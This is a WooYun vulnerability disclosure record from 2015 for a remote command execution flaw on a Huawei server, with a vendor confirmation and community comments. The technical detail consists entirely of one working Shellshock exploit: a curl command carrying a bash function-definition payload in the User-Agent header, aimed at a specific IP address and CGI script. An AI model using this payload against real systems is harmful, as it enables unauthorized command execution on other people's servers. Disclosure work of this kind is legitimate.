漏洞概要
关注数(24)
关注此漏洞
漏洞标题:华为某服务器存在远程命令执行漏洞
提交时间:2015-05-10 19:08
修复时间:2015-06-24 22:40
公开时间:2015-06-24 22:40
漏洞类型:命令执行
危害等级:高
自评Rank:20
漏洞状态:厂商已经确认
Tags标签:
无
漏洞详情
披露状态:
2015-05-10: 细节已通知厂商并且等待厂商处理中
2015-05-10: 厂商已经确认,细节仅向厂商公开
2015-05-20: 细节向核心白帽子及相关领域专家公开
2015-05-30: 细节向普通白帽子公开
2015-06-09: 细节向实习白帽子公开
2015-06-24: 细节向公众公开
简要描述:
华为某服务器存在远程命令执行漏洞
详细说明:
curl http://122.11.38.69:8082/cgi-bin/test-cgi -A "() { foo;};echo;/bin/ps -ef" -k
漏洞证明:
修复方案:
版权声明:转载请注明来源 猪猪侠@乌云
漏洞回应
厂商回应:
危害等级:中
漏洞Rank:10
确认时间:2015-05-10 22:38
厂商回复:
猪猪侠大名啊。感谢你的提醒。
最新状态:
暂无
漏洞评价:
评论
-
2015-05-10 19:10 |
Mr.R ( 实习白帽子 | Rank:52 漏洞数:14 | 求大神带我飞 qq2584110147)
-
2015-05-10 20:06 |
明月影 ( 路人 | Rank:12 漏洞数:8 | 学姿势,学思路。)
-
2015-05-10 20:39 |
封停 ( 实习白帽子 | Rank:38 漏洞数:8 | 求老中医指路)
-
2015-05-10 20:56 |
猪猪侠 ( 核心白帽子 | Rank:3224 漏洞数:254 | 你都有那么多超级棒棒糖了,还要自由干吗?)
@明月影 攒了2000多个漏洞,编辑好,准备同一天发。
-
2015-05-10 22:08 |
胡小树 ( 实习白帽子 | Rank:60 漏洞数:11 | 我是一颗小小树)
-
2015-05-10 22:44 |
PgHook ( 普通白帽子 | Rank:964 漏洞数:115 | ...........................................)
-
2015-05-11 00:42 |
暗羽 ( 路人 | Rank:21 漏洞数:6 | 喵呜,给人类的智商跪了)
-
2015-05-11 11:44 |
大物期末不能挂 ( 普通白帽子 | Rank:132 漏洞数:23 | 1.一个学渣,只求每门都不挂2.想把漏洞提...)
-
2015-05-11 14:43 |
美囤妈妈(乌云厂商)
-
2015-05-11 18:06 |
明月影 ( 路人 | Rank:12 漏洞数:8 | 学姿势,学思路。)
@胡小树 看来你根本不了解猪哥,他可以用工具发。发出来还很像自己发的。
-
2015-05-11 19:25 |
Mr.R ( 实习白帽子 | Rank:52 漏洞数:14 | 求大神带我飞 qq2584110147)
-
2015-06-25 11:10 |
Mark ( 路人 | Rank:8 漏洞数:2 | 渗透你的心)
-
2015-08-02 21:32 |
sOnsec ( 实习白帽子 | Rank:93 漏洞数:24 | 安全是什么...)